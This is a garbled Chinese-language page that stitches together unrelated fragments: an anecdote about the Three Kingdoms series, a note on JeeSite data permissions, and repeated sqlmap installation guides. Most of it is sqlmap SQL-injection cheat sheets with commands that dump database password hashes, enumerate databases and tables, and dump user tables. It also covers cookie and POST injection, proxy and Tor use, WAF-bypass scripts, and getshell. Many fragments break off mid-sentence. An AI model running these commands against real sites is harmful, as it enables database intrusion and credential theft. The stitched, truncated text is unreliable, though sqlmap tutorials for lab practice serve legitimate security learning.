sqlmap

　　中午吃饭时看了一下陆毅版的《三国》，刚好看的是蜀军缺粮，诸葛亮让王平去劫司马懿的粮。司马懿看蜀军用木牛流马运量很方便，就抢了蜀军的木牛流马仿制了一批，结果司马懿用它运粮时，被王平冒充司马懿的人在验粮时，对木牛流马动了手脚，结果木牛流马不能动弹了，被蜀军把几十万担的粮食抢走了。看到这里的时候，我想到了我们的项目。网上有个开源项目，在不熟悉的情况下把源码下载下来部署了就敢用？胆子是不是有点大？真遇到类似“木牛流马”的问题，那真的就亏大了啊。难道要联系作者？　　 　　呵呵～！！言归正传…… 　　在各种系统中，经常会涉及到数据权限的管理。在 JeeSite 开源系统中已经基本给出了一套解决数据权限管理的解决方案。下面来简单的进行说明一下我项目中涉及到的应用。 问题出发 　　在系统中每个信息录入人员之间的数据要求在显示时是分离的，即人员 A 录入的信息人员 B 是看不到的，同理人员 B 录入的信息人员 A 同样也是看不到的，人员 A 和人员 B 属于同一个部门。但是，人员 A 和人员 B 的部门负责人可以同时看到人员 A 和人员 B 录入的信息。在这种情况下，就需要使用到数据权限。 JeeSite 对数据权限的支持 　　要完成数据权限的功能，需要分为两部分，一部分是设置角色中对“数据范围”的控制，另一部分是在需要进行数据权限控制的地方增加相应的代码。 　　在角色中设置“数据范围”比较简单

简单的注入流程： 1.读取数据库版本，当前用户，当前数据库 sqlmap -u http://www.xx.com/test.php?p=2 -f -b --current-user --current-db -v 1 2.判断当前数据库用户权限 sqlmap -u http://www.xx.com/test.php?p=2 --privileges -U 用户名 -v 1 sqlmap -u http://www.xx.com/test.php?p=2 --is-dba -U 用户名 -v 1 3.读取所有数据库用户或指定数据库用户的密码 sqlmap -u http://www.xx.com/test.php?p=2 --users --passwords -v 2 sqlmap -u http://www.xx.com/test.php?p=2 --passwords -U root -v 2 4.获取所有数据库 sqlmap -u http://www.xx.com/test.php?p=2 --dbs -v 2 5.获取指定数据库中的所有表 sqlmap -u http://www.xx.com/test.php?p=2 --tables -D mysql -v 2 6.获取指定数据库名中指定表的字段 sqlmap -u http://www.xx.com/test

原文地址： http://www.ckhl8.com/jsjc/217.html 由于SQLMap是利用Python语言写的，所以需要将Python这个语言环境给安装上，以下是详细安装过程： 准备工作： (1) Python2.7.11； (2) SQLMap 下载地址： https://www.python.org/downloads/ 勾选后安装完成不再需要单独添加环境变量 ，默认是“去勾选”的； 2.4.安装完成后， 重启系统， 查看是否生效，“Win+R”，输入cmd，然后输入python Step3： SQLMap下载 下载地址： http://sqlmap.org/ Step4: SQLMap安装 4.2. 然后在桌面新建立一个cmd的快捷方式，并命名为“SQLMap”； 这样sqlmap就安装成功了 文章来源: sqlmap的安装教程

sqlmap是基于python环境的，所以在这之前需要安装python环境 Sqlmap Sqlmap 12 /plugins sqlmap 1、sqlmap python python 2.7 去官网下载即可，安装后不需单独配置环境 2、sqlmap python 3、测试是否安装成功 cmd sqlmap 4、在桌面创建快捷方式 sqlmap 然后确定 sqlmqp sqlmap sqlmap 1 Sqlmap -u url 本次测试用的本地搭建的网站 开始测试 测试结果，表明有注入点 结果存放在上诉路径的这个文件中 2、查看目标所有数据库 log 3、获取当前数据库 4、获取当前数据库下的表 --tables 5、获取字段名 -T --colums 6、获取内容 -T --dump 至此，测试完成。 sqlmap -u url -b banner --is-dba --current-db --current-user --dbs --tables --count --columns --dump -v sqlmap --level (1-5) 1 2 cookie 3 --risk 0-3 1 risk --technique B-> E-> U-> T-> S-> --time-sec DBMS 5 --proxy URL --cookie cookie --user

如果存在sql注入，获取数据过程 获取数据库 sqlmap -u “ http://192.168.120.249/baji/vul/sql/show1.php?id=1 ” --dbs 获取当前数据库 sqlmap -u “ http://192.168.120.249/baji/vul/sql/show1.php?id=1 ” --current-db 获取数据库中的表 sqlmap -u “ http://192.168.120.249/baji/vul/sql/show1.php?id=1 ” -D baji --tables 获取数据库中表的列 sqlmap -u “ http://192.168.120.249/baji/vul/sql/show1.php?id=1 ” -D baji -T users --columns 获取表中的数据 sqlmap -u “ http://192.168.120.249/baji/vul/sql/show1.php?id=1 ” -D baji -T users -C users “username ,password” --dump 显示5条数据 sqlmap -u “ http://192.168.120.249/baji/vul/sql/show1.php?id=1 ” -D baji -T users -C users

环境位置: https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe 参考: http://www.freesion.com/article/176849949/ 获取登陆地址的请求信息 往请求头信息加入X-Forwarded-For:* 一起写入 保存到本地txt文件 123.txt 执行sqlmap 搜索看有没有漏洞 /*--> */ /*--> */ /*--> */ /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt 出现: （存在可以注入） 获取当前用户权限 /*--> */ /*--> */ /*--> */ /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user 获取当前数据库库名 /*--> */ /*--> */ /*--> */ /*--> */ /*--> */ sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs 获取数据库表名 /*--> */ /*--> */ /*--> */ /*--> */ /*--> */ sqlmap.py -r /Users

sqlmap需要环境 1.python 2.7版本 2.sqlmap压缩包 python2.7下载地址： https://www.python.org/ 选择python 2.7.16 安装好后在cmd下使用python测试是否有环境变量 没有>>>需要配置环境变量 鼠标右键，点击此电脑属性 >>高级系统设置 新建，选择自己安装python的目录 下载地址： http://sqlmap.org/ 下载后解压，把解压后的文件夹放到python目录下，最好文件夹改一下名称，我自己改成sqlmap 然后在桌面右键>>新建快捷方式 完成后的图标 右键属性>>修改路径 确定后打开 输入sqlmap.py出现这个界面就安装成功了 谢谢各位朋友的支持 来源：51CTO 作者： ҹɫblack 链接：https://blog.csdn.net/weixin_42587513/article/details/100836399

1、cd /usr/bin/ 2、sudo git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 3、重新打开terminal输入此信息后，回车即可。 　　alias sqlmap=‘ Python /usr/bin/sqlmap-dev/sqlmap.py‘ 但是执行第二条命令的时候，wtf，报错了 你可能会遇到以下错误： 1、MAC OS下错误提示xcrun: error: invalid active developer path 2、 MAC下安装sqlmap sudo chmond 777 /usr/bin也不行，只好又怏怏地去百度，度来度去，后来一想索性自己mkdir一个算了 so，在根目录里，mkdir zyj 接下去就ok了。 装完之后，关闭terminal再开发现，输入sqlmap又gg了， 百度了下发现alias要生效的话，还需要在~/.bash_profile文件中设置一下。 1） open -e .bash_profile 添加 alias sqlmap=‘ Python /usr/bin/sqlmap-dev/sqlmap.py‘ ##类似于windows环境下设置环境变量；（PS：Alias是 Linux 中常用的别名命令，这么好的东东在mac中自然不会舍去

Sqlmap常规命令： ACCESS(一个数据库)： Sqlmap - u “ http : Sqlmap - u “ http : Sqlmap - u “ http : MYSQL(多个数据库)： Sqlmap - u “ http : Sqlmap - u “ http : Sqlmap - u “ http : Sqlmap - u “ http : Sqlmap - u “ http : Cookie 注入: Sqlmap - u “ http : POST注入： 两者区别根据具体情况选择 -r：用burp抓包保存为1.txt在sqlmap根目录，一般登陆框利用较多 Sqlmap . py - r “ 1.txt ” sqlmap - u “ http : 伪静态注入： 在存在注入的地方加上*,然后获取数据库 sqlmap . py - u “ http : Sqlmap代理： HTTP(S)代理: 如： sqlmap - u “ http : proxy - file ：加载代理 ip 列表 如： sqlmap . py - u “ http : //www.xxx.com/shownews.asp?id=1〃 -proxy-file=dl.txt（代理ip文件） ignore - proxy ：忽略本地代理设置 proxy http : Tor 代理模式:这个我没试过

sqlmap工具的使用： sql注入工具：明小子，啊d、罗卜头、穿山甲、sqlmap等等 开源自动化注入利用工具，支持的数据库有12种，在/plugins中可以看到支持的数据库种类，在所有注入利用工具中他是最好的！！ 支持的注入类型：bool、时间、报错、联合、、堆查询、内联 可以获取用户名、密码、权限、角色、数据库（表、、字段、内容） 可以爆破识别密文数据 getshell 命令执行 脱库/删除 目录介绍： doc介绍文档 extra 是sqlmap额外的功能运行CMD执行命令 lib是sqlmap核心功能代码 pluigifins 包含12种数据库识别程序 data 存放一些工具过程中使用的工具或命令 procs 包含了mssql mysql oracle postgresql shell 远程命令和后门 txt 表名列名、ua字典 udf 存放攻击载荷payload xml 存放检测的脚本 tamper 包含各种绕waf的处理脚本 thirdparty包含了第三方插件，颜色，优化等 sqlmap工作流程 （1）、初始化 （2）、开始检测 0>检测之前是否注入过（会把检测的url默认存放在家目录中.sqlmap下的output --output-dir参数可以指定存放的目录） 1>解析url，判断该url是否可访问 2>检测是否有WAF sqlmap -u“目录url” -